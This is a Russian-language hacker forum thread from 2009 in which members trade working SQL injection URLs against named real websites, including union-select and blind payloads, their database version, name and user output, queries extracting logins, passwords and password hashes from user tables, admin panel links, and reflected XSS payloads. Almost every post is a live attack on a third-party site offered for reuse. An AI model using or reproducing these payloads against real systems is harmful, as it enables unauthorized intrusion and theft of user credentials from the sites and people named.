SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Microsoft SQL Server 2005 - 9.00.2050.00 (Intel X86) Feb 13 2007 23:02:48 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
  2. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    390
    Reputations:
    58
    Code:
    http://www.lifelinebatteries.com/marineflyer.php?id=-3+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    Database Version: 5.0.45
    Database name: batteries
    User name: concorde_lynda@localhost
     
    1 person likes this.
  3. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    PR 6
    BLIND
    Code:
    https://www.calico.org/page.php?id=1'+and+substring(version(),1,1)=5/*
     
  4. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    http://krasotaspb.ru/services/news/article.php?ID=-13236+union+select+1,2,3,4,5,6,login,8,9,password+from+b_user+limit+105,1

    Соц сеть какая то недоделаная. Пр 2 . 5я ветка.
    Акков около 2200
     
  5. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    http://www.anca.org/press_releases/press_releases.php?prid=1541+and+substring(version(),1,1)=3
     
    2 people like this.
  6. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    http://avtodeti.ru
    Портал о безопасности детей на дорогах

    ==========

     
    #10066 Snap, 10 Jul 2009
    Last edited by a moderator: 10 Jul 2009
    1 person likes this.
  7. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    PR 5
    Code:
    http://www.irs-net.de/kontakt/mitarbeiter.php?id=1+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,unhex(hex(concat_ws(0x3a,user,password))),17,18,19,20,21+from+mysql.user+limit+0,1/*
    Database Version: 4.1.11-log
    Database name: web
    User name: [email protected]
     
  8. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    390
    Reputations:
    58
    PR 5
    Code:
    http://www.digitallyobsessed.com/displaypr.php?ID=-608+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,28,29,30,31,32,33,34,35,36+from+users--
    Database Version: 5.0.81-community
    Database name: bobftp_obsessed
    User name: bobftp_king@localhost
     
  9. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+0+UNION+SELECT+1,2,3,4,5,6,7,CONCAT(Version(),Database(),User()),9,10,11--

    Database Version: 5.0.67-log
    Database name: u158438
    User name: [email protected]

    http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+0+UNION+SELECT+CONCAT((SELECT+CONCAT(converge_id,converge_pass_hash,converge_pass_salt)+FROM+u158438.ibf_members_converge+LIMIT+2,1)),2,3,4,5,6,7,8,9,10,11--

    админка
    http://www.belsoft.ru/forum/admin.php
     
    3 people like this.
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://ru.tv-mis.com/titul.php?id=1+and+substring(version(),1,1)=5

    ЗЫ еще xss Напишу

    http://ru.tv-mis.com./titul.php?id=%20%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E =)

    ####################################

    http://www.kokomansion.tv/showvideos.php?id=-1+union+select+1,concat(0x3a,user(),version(),database()),3,4,5,6,7,8,9--

    [email protected]

    ЗЫ еще xss Напишу

    http://www.kokomansion.tv/showvideos.php?id=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E

    ####################################
    http://www.oreol.tv/services/channel.php?id=1+and+substring(version(),1,1)=5--
     
    _________________________
    #10070 HAXTA4OK, 11 Jul 2009
    Last edited: 11 Jul 2009
  11. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    http://www.gtbike.ru/articles.php?menu_id=38&razd_id=0&pg=1&id=-60+union+select+1,2,3,version(),5,6,7,8,9 PR 4
     
    #10071 Krist_ALL, 11 Jul 2009
    Last edited by a moderator: 11 Jul 2009
    2 people like this.
  12. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    http://www.wavplanet.com/wavs.php?cat=5+union+select+1,concat(version(),database(),user()),3,4,5,6,7--


    4.0.17-standard-log wavplanet [email protected]
     
  13. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 6]
    Code:
    http://www.dacc.[COLOR=Lime]edu[/COLOR]/news/index.php?id=-503+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9
    4.1.21-standard:news:public@localhost
    ==============================
    [PR 4]
    Code:
    http://www.laererportalen.dk/kalender.php?id=-547+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10
    5.1.35:laererportal:laererportal_u@localhost
    ==============================
    [PR 4]
    Code:
    http://www.szgl.at/kalender.php?id=-28+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6
    4.0.23-Max-log:d00942bb:d00942bb@localhost
    ==============================
    [PR 3]
    Code:
    http://www.futter-fuers-volk.de/kalender.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
    5.0.51a-3ubuntu5.1:usr_web68_2:web68@localhost
    ==============================
    [PR 3]
    Code:
    http://www.b-b-z.nl/jubileum/kalender.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7
    5.0.51a-3ubuntu5.4:b_b_z:b-b-z@localhost
    ==============================
    [PR 2]
    Code:
    http://www.alexandra-ihrig.de/kalender.php?id=-12+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4
    4.0.27-max-log:db196773590:[email protected]
    ==============================
    [PR 0]
    Code:
    http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())
    5.0.81-1-log:neo24:[email protected]
    Code:
    http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,user_password)+from+phoenix_phpbb_users
    Code:
    http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+tbl_users
     
    1 person likes this.
  14. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    http://www.radioworld.ca/information.php?info_id=-45+union+select+1,2,3+from+admin+--
    4я версия
     
  15. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    db_info:
    http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7--+
    tables:
    http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,group_concat(0x0b,column_name),6,7+from+information_schema.columns+where+table_name=0x7373735f70616e656c--+
    ЗЫ: сайт на одном сервере с "инъектором" (inj3ct0r.com)
     
  16. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    blind

    http://www.hopewell-precision.com/product.php?prod_id=5+AND+ascii(lower(substring(database(),1,1)))>1

    stan12187@localhost
    stan121871
    5.1.22-log
     
  17. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    blind PR4

    http://www.pollanetsquad.it/attore.asp?cod_att=2150+and+ascii(substring((concat_ws(char(58),user(),database(),version())),1,1))>1

    Sql135947@%:Sql135947_1:5.0.68-log
     
    1 person likes this.
  18. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    http://www.baltimorebrass.net/index.php?cat=5+UNION+SELECT+1,2,3,4,CONCAT(Version(),Database(),User()),6,7--

    67-communitybaltim4_websitebaltim4_wsclient@localhost
     
    1 person likes this.
  19. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    Code:
    http://www.n-rabota.ru/resume/post.php?id=1+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
    Database Version: 5.0.81
    Database name: n-rabota
    User name: n-rabota@localhost
     
    1 person likes this.
  20. rolex

    rolex Member

    Joined:
    7 Apr 2009
    Messages:
    27
    Likes Received:
    35
    Reputations:
    4
    вывод в тег img
     
    #10080 rolex, 12 Jul 2009
    Last edited by a moderator: 12 Jul 2009
Thread Status:
Not open for further replies.